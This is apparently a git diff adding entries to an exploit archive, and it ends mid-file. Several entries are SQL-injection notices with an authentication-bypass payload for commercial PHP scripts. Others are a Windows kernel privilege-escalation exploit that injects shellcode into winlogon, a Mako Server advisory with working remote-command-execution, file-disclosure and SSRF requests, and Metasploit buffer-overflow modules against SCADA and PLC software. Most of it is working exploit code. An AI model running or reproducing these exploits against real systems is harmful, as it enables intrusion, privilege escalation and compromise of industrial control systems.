+# Demo: http://icloudcenter.net/demos/icjewelry/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42680.txt b/platforms/php/webapps/42680.txt
new file mode 100755
index 000000000..f4452402c
--- /dev/null
+++ b/platforms/php/webapps/42680.txt
@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Custom T-Shirt WebStore Script 1.2 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/t-shirt.htm
+# Demo: http://icloudcenter.net/demos/ictshirt/
+# Version: 1.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42681.txt b/platforms/php/webapps/42681.txt
new file mode 100755
index 000000000..83d3d0c72
--- /dev/null
+++ b/platforms/php/webapps/42681.txt
@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Customized Products Shopping Script 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/bpProductConfigurator.htm
+# Demo: http://icloudcenter.net/demos/icproductconfigurator/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42682.txt b/platforms/php/webapps/42682.txt
new file mode 100755
index 000000000..866aca857
--- /dev/null
+++ b/platforms/php/webapps/42682.txt
@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Grocery Store Supermarket Script 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/grocery-store-supermarket-script.htm
+# Demo: http://icloudcenter.net/demos/icgrocery/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42684.txt b/platforms/php/webapps/42684.txt
new file mode 100755
index 000000000..9cd728c21
--- /dev/null
+++ b/platforms/php/webapps/42684.txt
@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Car Rental Script 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/limousine-car-hire-script.html
+# Demo: http://icloudcenter.net/demos/iccalllimousine/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42685.txt b/platforms/php/webapps/42685.txt
new file mode 100755
index 000000000..cfb333ee7
--- /dev/null
+++ b/platforms/php/webapps/42685.txt
@@ -0,0 +1,31 @@
+# # # # # 
+# Exploit Title: Project Bidding Script 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/project_bidding_script.htm
+# Demo: http://www.icloudcenter.net/demos/icprojectbidding/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/admin
+# 
+# User: 'or 1=1 or ''=' Pass: anything
+# 
+# http://localhost/[PATH]/admin/viewuserips.php?id=[SQL]
+
+# http://localhost/[PATH]/admin/editadminuser.php?id=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42686.txt b/platforms/php/webapps/42686.txt
new file mode 100755
index 000000000..9ff417a61
--- /dev/null
+++ b/platforms/php/webapps/42686.txt
@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Dental Clinic Site Script 1.2 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/dental-clinic-script.htm
+# Demo: http://icloudcenter.net/demos/icdentalclinic/
+# Version: 1.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42688.txt b/platforms/php/webapps/42688.txt
new file mode 100755
index 000000000..443d935b7
--- /dev/null
+++ b/platforms/php/webapps/42688.txt
@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Support Tickets Helpdesk PHP Script 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/support-tickets-helpdesk-script.htm
+# Demo: http://icloudcenter.net/demos/ichelpdesk/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/index.php?page=static_pages&pk=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42689.txt b/platforms/php/webapps/42689.txt
new file mode 100755
index 000000000..a3bfb5ded
--- /dev/null
+++ b/platforms/php/webapps/42689.txt
@@ -0,0 +1,29 @@
+# # # # # 
+# Exploit Title: Website Builder Script With e-Commerce 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/site-builder-script.htm
+# Demo: http://icloudcenter.net/demos/icsitebuilder/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/index.php?page=news&nid=[SQL]
+# 
+# http://localhost/[PATH]/admin
+# 
+# User: 'or 1=1 or ''=' Pass: anything
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/windows/local/42665.py b/platforms/windows/local/42665.py
index fdf5e9917..3befa8def 100755
--- a/platforms/windows/local/42665.py
+++ b/platforms/windows/local/42665.py
@@ -34,7 +34,9 @@ Timeline:
 Exploitation:
 =============
 
-This exploit uses a data only attack via the Quota Process Pointer Overwrite technique. We smash the token and dec a controlled address by 0x50 (size of the Mutant) to enable SeDebugPrivilege's. Then we inject code into a system process.
+This exploit uses a data only attack via the Quota Process Pointer Overwrite technique. We smash the token's _SEP_TOKEN_PRIVILEGES->Enabled and dec the controlled address by 0x50 (size of the Mutant) to enable SeDebugPrivilege's. Then we inject code into a system process.
+
+Note that this exploit doesn't use any kernel mode shellcode :->
 
 References:
 ===========
@@ -222,11 +224,10 @@ def alloc_pool_overflow_buffer(base, input_size):
     print "(+) allocating pool overflow input buffer"
     baseadd   = c_int(base)
     size = c_int(input_size)
+    priv = token + 0x40 + 0x8                  # Enabled
 
     input  = struct.pack("<I", 0x0000001a)     # size
     input += "\x44" * 0x398                    # offset to overflown chunks
-
-    priv = token + 0x40 + 0x8                  # Enabled
     
     # patch
     input += struct.pack("<I", 0x040a008c)     # _POOL_HEADER
@@ -235,13 +236,13 @@ def alloc_pool_overflow_buffer(base, input_size):
     input += struct.pack("<I", 0x00000000)
     input += struct.pack("<I", 0x00000001)
     input += "\x44" * 0x20
-    input += struct.pack("<I", 0x00000001)
+    input += struct.pack("<I", 0x00000001)     # set @ecx to 0x1, to write another 0x4 dwords
     input += struct.pack("<I", 0x00000000)
     input += "\x44" * 8
     input += struct.pack("<I", 0x00000001)
     input += struct.pack("<I", 0x00000001)
     input += "\x44" * 4
-    input += struct.pack("<I", 0x0008000e)
+    input += struct.pack("<I", 0x0008000e)     # restore the TypeIndex ;-)
     input += struct.pack("<I", priv)           # Quota Process Pointer Overwrite
 
     # filler
@@ -354,33 +355,41 @@ def we_can_leak_token():
 
 def trigger_lpe():
     """
-    This function frees the IoCompletionReserve objects and this triggers the 
-    registered aexit, which is our controlled pointer to OkayToCloseProcedure.
+    This function frees the Mutant objects and this triggers the 
+    usage of the Quota Process Pointer, dec'ing by 0x50, avoiding OkayToCloseProcedure.
     """
-    # free the corrupted chunk to trigger OkayToCloseProcedure
+
     # we dont know where the free chunk is, we just know its in one of the pages 
-    # full of Mutants and that its the 2nd chunk after the overflowed buffer.
+    # full of Mutants and that its the 2nd chunk after the overflowed buffer. Good enough.
     for v in to_free:
         kernel32.CloseHandle(v)
 
 def get_winlogin_pid():
+    """
+    Just gets winlogon pid. Get whateva system pid you want
+    """
     for proc in psutil.process_iter():
-
-        # choose whateva system process
         if proc.name() == "winlogon.exe":
             return proc.pid
     return 0
 
 def we_can_inject():
+    """
+    Now that we have the SeDebugPrivilege, we can inject into a system process.
+    I choose winlogon because you get the bonus GUI.
+    """
     page_rwx_value = 0x40
-    process_all = 0x1F0FFF
-    memcommit = 0x00001000
-    process_handle = windll.kernel32.OpenProcess(process_all, False, get_winlogin_pid()) # WinLogin
-    if process_handle == 0:
-        return False
-    print "(+) got a handle to winlogon! 0x%x" % process_handle
+    process_all    = 0x1f0fff
+    memcommit      = 0x00001000
+    hThread        = HANDLE()
 
-    # metasploit EXITFUNC=Thread
+    # get a handle to the process
+    pHandle = windll.kernel32.OpenProcess(process_all, False, get_winlogin_pid())
+    if pHandle == 0:
+        return False
+    print "(+) got a handle to winlogon! 0x%x" % pHandle
+
+    # metasploit windows/exec CMD=cmd.exe EXITFUNC=Thread
     buf =  ""
     buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
     buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
@@ -398,13 +407,16 @@ def we_can_inject():
     buf += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
     buf += "\xff\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00"
 
-    shellcode_length = len(buf)
-    hThread = HANDLE()
-    memory_allocation_variable = windll.kernel32.VirtualAllocEx(process_handle, 0, shellcode_length, memcommit, page_rwx_value)
-    print "(+) allocated shellcode in winlogon @ 0x%x" % memory_allocation_variable
-    res = windll.kernel32.WriteProcessMemory(process_handle, memory_allocation_variable, buf, shellcode_length, 0)
+    # allocate some memory in the process
+    fPointer = windll.kernel32.VirtualAllocEx(pHandle, 0, len(buf), memcommit, page_rwx_value)
+    print "(+) allocated shellcode in winlogon @ 0x%x" % fPointer
+
+    # write the shellcode to the memory
+    res = windll.kernel32.WriteProcessMemory(pHandle, fPointer, buf, len(buf), 0)
     print "(+) WriteProcessMemory returned: 0x%x" % res
-    res = windll.ntdll.RtlCreateUserThread(process_handle, None, 0, 0, 0, 0, memory_allocation_variable, 0, byref(hThread), 0)
+
+    # create a new thread that starts execution at that code location
+    res = windll.ntdll.RtlCreateUserThread(pHandle, None, 0, 0, 0, 0, fPointer, 0, byref(hThread), 0)
     print "(+) RtlCreateUserThread returned: 0x%x" % res
     return True
 
diff --git a/platforms/windows/remote/42683.txt b/platforms/windows/remote/42683.txt
new file mode 100755
index 000000000..a94ec57b0
--- /dev/null
+++ b/platforms/windows/remote/42683.txt
@@ -0,0 +1,161 @@
+[+] SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3391
+[+] Credits: John Page a.k.a hyp3rlinx	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MAKO-WEB-SERVER-MULTIPLE-UNAUTHENTICATED-VULNERABILIITIES-SECURITEAM.txt
+[+] ISR: ApparitionSec            
+
+
+Vulnerabilities Summary
+The following advisory describe three (3) vulnerabilities found in Mako Server’s tutorial page.
+
+The vulnerabilities found are:
+
+Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution
+Unauthenticated File Disclosure
+Unauthenticated Server Side Request Forgery
+As these tutorial may be used as the basis for production code, it is important for users to be aware of these issues.
+
+“As a compact application and web server, the Mako Server helps developers rapidly design secure IoT and web applications. The Mako Server provides
+an application server environment from which developers can design and implement complete, custom solutions. The Mako Web Server is ideal for embedded Linux systems.”
+
+Credit
+An independent security researcher, John Page AKA hyp3rlinx, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
+
+Vendor response
+
+RealTimeLogic was informed of the vulnerability on Aug 13, but while acknowledging the receipt of the vulnerability information, refused to respond to the
+technical claims, to give a fix timeline or coordinate an advisory, saying:
+
+“I just sent a formal notification for the commercial license requirement and also we need to put a maintenance contract in place.
+Internally I need to set-up a cost allocation account for billing against these support inquiries.”
+
+At this time it’s unclear whether these vulnerabilities are going to be fixed and further attempts to get a status clarification failed.
+
+
+Vulnerabilities details
+
+Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution:
+
+Mako web-server tutorial does not sufficiently sanitizing the HTTP PUT requests, when an attacker send HTTP PUT request to ‘save.lsp‘ web page, the input passed
+to a function responsible for accessing the filesystem.
+
+The attacker input will be saved on the victims machine and can be execute by sending HTTP GET request to ‘manage.lsp‘
+
+
+HTTP PUT  'http://VICTIM-IP/examples/save.lsp?ex=2.1'
+HTTP GET  'http://VICTIM-IP/examples/manage.lsp?execute=true&ex=2.1&type=lua'
+
+
+Proof of Concept
+
+
+import urllib2,time
+
+#MakoServer v2.5 Remote Command Execution 0day
+#Credits: John Page AKA hyp3rlinx
+#=========================================
+
+print  'MakoServer v2.5 Remote Command Execution'
+
+CMD="os.execute('c:/Windows/system32/calc.exe')"
+
+opener = urllib2.build_opener(urllib2.HTTPHandler)
+request = urllib2.Request('http://IP/examples/save.lsp?ex=2.1', data=CMD)
+request.add_header('Content-Type', 'text/plain;charset=UTF-8')
+request.add_header('X-Requested-With', 'XMLHttpRequest')
+request.add_header('Referer', 'http://localhost/Lua-Types.lsp')
+request.get_method = lambda: 'PUT'
+opener.open(request)
+
+time.sleep(1)
+
+urllib2.urlopen('http://IP/examples/manage.lsp?execute=true&ex=2.1&type=lua')
+
+
+
+Unauthenticated File Disclosure
+
+Mako web-server tutorial is not sufficiently sanitizing GET requests, when an attacker send GET request to the URI IP/fs/../.., the input passed
+without modification and the response with the file content is returned.
+
+Proof of Concept
+The following GET request will response with the C/Windows/system.ini content:
+
+curl -v http://VICTIM-IP/fs/C/Windows/system.ini
+
+* About to connect() to VICTIM-IP port 80
+*   Trying VICTIM-IP... connected
+* Connected to VICTIM-IP (VICTIM-IP) port 80
+> GET /fs/C/Windows/system.ini HTTP/1.1
+> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
+> Host: VICTIM-IP
+> Accept: */*
+>
+< HTTP/1.1 200 OK
+< Date: Mon, 07 Aug 2017 22:21:27 GMT
+< Server: MakoServer.net
+< Content-Type: application/octet-stream
+< Accept-Ranges: bytes
+< Etag: 58b4be20
+< Last-Modified: Tue, 28 Feb 2017 00:02:40 GMT
+< Content-Length: 219
+< Keep-Alive: Keep-Alive
+; for 16-bit app support
+[386Enh]
+woafont=dosapp.fon
+EGA80WOA.FON=EGA80WOA.FON
+EGA40WOA.FON=EGA40WOA.FON
+CGA80WOA.FON=CGA80WOA.FON
+CGA40WOA.FON=CGA40WOA.FON
+
+[drivers]
+wave=mmdrv.dll
+timer=timer.drv
+
+[mci]
+
+
+Server Side Request Forgery
+
+Mako web-server tutorial is not sufficiently sanitizing incoming POST requests, when an attacker sends an POST request to the ‘rtl/appmgr/new-application.lsp‘
+URI, the input will be executed and the server will connect to the attacker’s machine.
+
+Proof of Concept
+Start Wireshark to see successful connections made from Mako Web Server victim machine.
+
+Initiate requests from another machine using CURL:
+
+curl -v -X POST http://VICTIM-IP/rtl/appmgr/new-application.lsp -d io=net -d path=http://EXTERNAL-IP
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+====================
+Would like to acknowledge Beyond Security’s SSD program for the help with co-ordination of this vulnerability.
+More details can be found on their blog at:
+
+https://blogs.securiteam.com/index.php/archives/3391
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/platforms/windows/remote/42691.rb b/platforms/windows/remote/42691.rb
new file mode 100755
index 000000000..50b628bfb
--- /dev/null
+++ b/platforms/windows/remote/42691.rb
@@ -0,0 +1,68 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::TcpServer
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'ZScada Net Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a stack based buffer overflow found in
+				Z-Scada Net 2.0.  The vulnerability is triggered when parsing
+				the response to a Modbus packet.
+			},
+			'Author'         => [ 'james fitts' ],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'url', 'https://lists.immunityinc.com/pipermail/canvas/2014-December/000141.html' ],
+				],
+			'Privileged'     => false,
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 500,
+					'BadChars' => "",
+					'StackAdjustment' => -3500
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[
+						'Windows XP SP3 EN', 
+							{
+								# zscadanet.exe v1.0
+								# pop ecx/ pop ebp/ retn
+								'Ret' => 0x00429c35
+							} 
+					],
+				],
+			'DefaultTarget' => 0,
+			'DisclosureDate' => 'Dec 11 2014'))
+
+		register_options(
+			[
+				OptPort.new('SRVPORT', [ true, "The port to listen on", 502])
+			], self.class)
+	end
+
+	def on_client_data(client)
+		p = payload.encoded
+
+		buf = pattern_create(5000)
+		buf[574, 4] = [0x909006eb].pack('V')	# jmp $+8
+		buf[578, 4] = [target.ret].pack('V')
+		buf[582, 24] = "\x41" * 24
+		buf[606, p.length] = p
+
+		client.put(buf)
+		handler
+		service.close_client(client)
+	end
+
+end
diff --git a/platforms/windows/remote/42693.rb b/platforms/windows/remote/42693.rb
new file mode 100755
index 000000000..1cf2092ff
--- /dev/null
+++ b/platforms/windows/remote/42693.rb
@@ -0,0 +1,73 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::TcpServer
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'VIPA Authomation WinPLC7 recv Stack Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a stack based buffer overflow found in VIPA
+				Automation WinPLC7 <= 5.0.45.5921. The overflow is triggered when
+				WinPLC7 connects to a remote server and accepts a malicious packet.
+				The first 2 bytes of this packet are read in and used as the size
+				value for a later recv function.  If a size value of sufficiently
+				large size is supplied a stack buffer overflow will occur
+			},
+			'Author'         => [ 'james fitts' ],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'ZDI', '17-112' ],
+					[ 'CVE', '2017-5177' ],
+					[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-054-01' ]
+				],
+			'Privileged'     => false,
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 500,
+					'BadChars' => "",
+					'StackAdjustment' => -3500
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[
+						'Windows 7 EN', 
+							{
+								# ws7v5.exe
+								# jmp esp
+								'Ret' => 0x00422354
+							} 
+					],
+				],
+			'DefaultTarget' => 0,
+			'DisclosureDate' => 'Feb 28 2017'))
+
+		register_options(
+			[
+				OptPort.new('SRVPORT', [ true, "The port to listen on", 7777])
+			], self.class)
+	end
+
+	def on_client_data(client)
+		p = payload.encoded
+
+		pkt =  "\x13\x88\x00\x00\x00"	# len
+		pkt += Rex::Text.pattern_create(5000)
+
+		pkt[848, 4] = [target.ret].pack('V')
+		pkt[852, p.length] = p
+
+		client.put(pkt)
+		handler
+		service.close_client(client)
+	end
+
+end
diff --git a/platforms/windows/remote/42694.rb b/platforms/windows/remote/42694.rb
new file mode 100755
index 000000000..6a3b6fb04
--- /dev/null
+++ b/platforms/windows/remote/42694.rb
@@ -0,0 +1,100 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Sielco Sistemi Winlog <= 2.07.16',
+			'Description'    => %q{
+				This module exploits a stack based buffer overflow
+				found in Sielco Sistemi Winlog <= 2.07.16. The
+				overflow is triggered during the parsing of a
+				maliciously crafted packet
+			},
+			'Author'         => [ 'James Fitts' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: $',
+			'References'     =>
+				[
+				],
+			'Privileged'     => true,
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread',
+				},
+			'Payload'        =>
+				{
+					'Space' => 150,
+					'BadChars' => "\x00\x0a\x0d\x20",
+					'DisableNops' => 'True',
+					# add esp, -5500
+					'PrependEncoder' => "\x81\xc4\x84\xea\xff\xff",
+					'Compat'	=>
+						{
+							'SymbolLookup' => 'ws2ord',
+						}
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[
+						'Windows XP SP3 EN (Automatic Washing System Demo)',
+							{
+								# vcldb40.bpl
+								# jmp esp
+								'Ret' => 0x46035f8b,
+								'Offset' => 160,
+								'jmp' => "\xe9\x56\xff\xff\xff",
+							}
+					],
+					[
+						'Windows XP SP3 EN (Car Simulation)',
+							{
+								# vcl40.bpl
+								# jmp esp
+								'Ret' => 0x4003eb6b,
+								'Offset' => 175,
+								'jmp' => "\xe9\x46\xff\xff\xff",
+							}
+					],
+					[ 
+						'Windows XP SP3 EN (Ceramics Kiln)', 
+							{ 
+								# ter19.dll
+								# push esp/ retn
+								'Ret' => 0x258b4432,
+								'Offset' => 176,
+								'jmp' => "\xe9\x46\xff\xff\xff",
+							} 
+					],
+				],
+			'DefaultTarget' => 0,
+			'DisclosureDate' => 'Jun 26 2012'))
+
+		register_options([Opt::RPORT(46824)], self.class)
+	end
+
+	def exploit
+		connect
+
+		boom =  rand_text_alpha_upper(20)
+		boom << 'x'
+		boom << rand_text_alpha_upper(target['Offset'])
+		boom << [target.ret].pack('V')
+		boom << "\x41" * 4
+		boom << target['jmp']
+		boom << "\xcc" * (281 - boom.length)
+
+		boom[22,4] = "\x41" * 4
+		boom[26,payload.encoded.length] = payload.encoded
+
+		print_status("Trying target #{target.name}...")
+		sock.put(boom)
+
+		handler
+	end
+
+end
diff --git a/platforms/windows/remote/42696.rb b/platforms/windows/remote/42696.rb
new file mode 100755
index 000000000..97923e28b
--- /dev/null
+++ b/platforms/windows/remote/42696.rb
@@ -0,0 +1,84 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Motorola Netopia Netoctopus SDCS Stack Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a vulnerability within the code responsible for
+				parsing client requests. When reading in a request from the network,
+				a 32-bit integer is read in that specifies the number of bytes that
+				follow. This value is not validated, and is then used to read data into
+				a fixed-size stack buffer.
+			},
+			'Author'         => [ 'James Fitts' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: $',
+			'References'     =>
+				[
+					[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=851' ]
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread',
+				},
+			'Privileged'     => true,
+			'Payload'        =>
+				{
+					'Space'	=> 500,
+					'DisableNops' => 'true',
+					'BadChars' => "",
+					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 
+						'Windows XP SP3 EN', 
+							{ 
+								# pop ecx/ pop ecx/ retn
+								# msvcrt.dll
+								'Ret' => 0x0044e046, 
+							} 
+					],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Jul 14 2008'))
+
+		register_options(
+			[
+				Opt::RPORT(3814)
+			], self.class )
+	end
+
+	def exploit
+		connect
+
+		p = payload.encoded
+
+		pkt = "\x41" * 600
+		pkt[0, 4] = [0x01000000].pack('V')
+		pkt[8, 4] = [0x01000000].pack('V')
+		pkt[12, 4] = [0x01000000].pack('V')
+		pkt[16, 4] = [0x03000000].pack('V')		# this is the value mentioned above
+		pkt[20, 4] = [0x66000000].pack('V')
+		pkt[30, p.length] = p
+		pkt[545, 4] = "\xeb\x06\x90\x90"
+		pkt[549, 4] = [target.ret].pack('V')
+		pkt[558, 6] = "\x81\xc4\x34\x06\x00\x00"	# add esp, 1588
+		pkt[564, 2] = "\xff\xe4"			# jmp esp
+
+
+		print_status("Trying target %s..." % target.name)
+
+		sock.put(pkt)
+
+		handler
+		disconnect
+	end
+
+end
diff --git a/platforms/windows/remote/42700.rb b/platforms/windows/remote/42700.rb
new file mode 100755
index 000000000..9b7090053
--- /dev/null
+++ b/platforms/windows/remote/42700.rb
@@ -0,0 +1,71 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::TcpServer
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Fatek Automation PLC WinProladder Stack-based Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a stack based buffer overflow found in Fatek Automation
+				PLC WinProladder v3.11 Build 14701. The vulnerability is triggered when a client
+				connects to a listening server. The client does not properly sanitize the length
+				of the received input prior to placing it on the stack.
+			},
+			'Author'         => [ 'james fitts' ],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'ZDI', '16-672' ],
+					[ 'CVE', '2016-8377' ],
+					[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-350-01' ]
+				],
+			'Privileged'     => false,
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 1000,
+					'BadChars' => "\x00\x0a\x0d\x20",
+					'StackAdjustment' => -3500
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[
+						'Windows 7 EN', 
+							{
+								# CC3250MT.dll
+								# pop ecx/ pop ebp/ retn
+								'Ret' => 0x32514d79
+							} 
+					],
+				],
+			'DefaultTarget' => 0,
+			'DisclosureDate' => 'Dec 15 2016'))
+
+		register_options(
+			[
+				OptPort.new('SRVPORT', [ true, "The port to listen on", 500])
+			], self.class)
+	end
+
+	def on_client_data(client)
+		p = payload.encoded
+
+		pkt = "A" * 10000
